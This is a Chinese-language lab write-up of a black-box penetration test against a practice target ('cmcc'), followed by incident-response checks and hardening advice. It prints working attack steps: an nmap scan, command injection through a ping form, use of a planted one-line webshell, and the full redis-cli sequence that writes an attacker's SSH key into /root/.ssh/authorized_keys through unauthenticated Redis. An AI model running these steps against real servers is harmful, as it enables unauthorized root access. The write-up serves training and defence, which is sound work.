黑盒测试靶机(cmcc)以及对应系统加固方案

目录

一、信息收集

二、进入web界面

三、redis  6379连接。

 四、连接蚁剑成功。

这是个沙箱。

 五、redis入手,使用密钥连接

六、尝试docker越狱

七、针对docker进行入侵排查

从系统层面

1、检查进程

2、木马样本可以保留样本后删除,兵结束进程

 3、检查开机启动项目

4、检查计划任务

 应用层面

1、reris未授权远程访问

2、web服务中存在的命令注入


一、信息收集

nmap -Pn -A 192.168.12.153  -p 1-20000      #获取目标主机大概信息

黑盒测试靶机(cmcc)以及对应系统加固方案_第1张图片

22            #端口可疑尝试爆破

80         #web服务

6379        #redis服务尝试连接 

上面两个比较熟悉(柿子要找软的捏)

20000      #端口就比较不熟悉  

二、进入web界面

黑盒测试靶机(cmcc)以及对应系统加固方案_第2张图片

问题:

        1、Ping命令中执行其他命令(靶场都很常见)

        2、这里的用户为www-data,但是可以执行find  cat 等命令来获取信息

        3、可以使用  ls  查看当前文件目录存在phpinfo.php在该文件目录下

        4、还有危险文件hack.php:     现成的一句话木马文件。

三、使用蚁剑连接。

黑盒测试靶机(cmcc)以及对应系统加固方案_第3张图片

到这里那么恭喜你,成功进入坑里。

这是个沙箱。只不过当前用户是  www-data没有root权限

黑盒测试靶机(cmcc)以及对应系统加固方案_第4张图片

五、redis入手,使用密钥连接

这里从  ps aux  也可以看到,redis也是docker里面的服务

黑盒测试靶机(cmcc)以及对应系统加固方案_第5张图片

 #制作这个密钥相当于只是进行提权

cd /root/.ssh  

ssh-keygen  #生成密钥

cd /root/.ssh   #进入到生成的密钥的界面

touch pass.txt  #生成一个文件存储密钥

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > pass.txt  #把密钥写入文件中

cat pass.txt| redis-cli -h 192.168.12.153 -x set crack  #密钥赋值

#利用redis来上传密钥

192.168.12.153:6379> config set dir /root/.ssh
192.168.12.153:6379> config  set dbfilename authorized_keys   
192.168.12.153:6379> save

通过ssh指定密钥文件进行远程连接

黑盒测试靶机(cmcc)以及对应系统加固方案_第6张图片

黑盒测试靶机(cmcc)以及对应系统加固方案_第7张图片

 成功成为了 !!!!!!!!!

docker的root

黑盒测试靶机(cmcc)以及对应系统加固方案_第8张图片

六、尝试docker越狱(You Can You UP!)

1、确认docker信息

ls -alh /.dockerenv

未果。

七、针对docker进行入侵排查

从系统层面

1、检查进程

top    #从这里可以看到这是一个木马进程

黑盒测试靶机(cmcc)以及对应系统加固方案_第9张图片

 find / -name  trojan               #查看木马文件位置

2、木马样本可以保留样本后删除,并结束进程

kill 60 72 && rm -rf /user/share/trojan/

 3、检查开机启动项目

cat /etc/rc.local      #查看本地开机启动项

4、检查计划任务

crontab -l        #检查计划任务 

 应用层面

1、reris未授权远程访问

修复方案:

①设置复杂的访问密码:  config set requirepass $%_+V#!F$##$DSad

②修改配置文件    vi ../../redis.conf  文件配置密码

2、web服务中存在的命令注入

可以使用cat  find 等命令进行敏感文件读取。

黑盒测试靶机(cmcc)以及对应系统加固方案_第10张图片

修复方案:

①使用正则去严格匹配IP的格式。凡是不是IP的直接drop

你可能感兴趣的:(网络安全,linux,redis)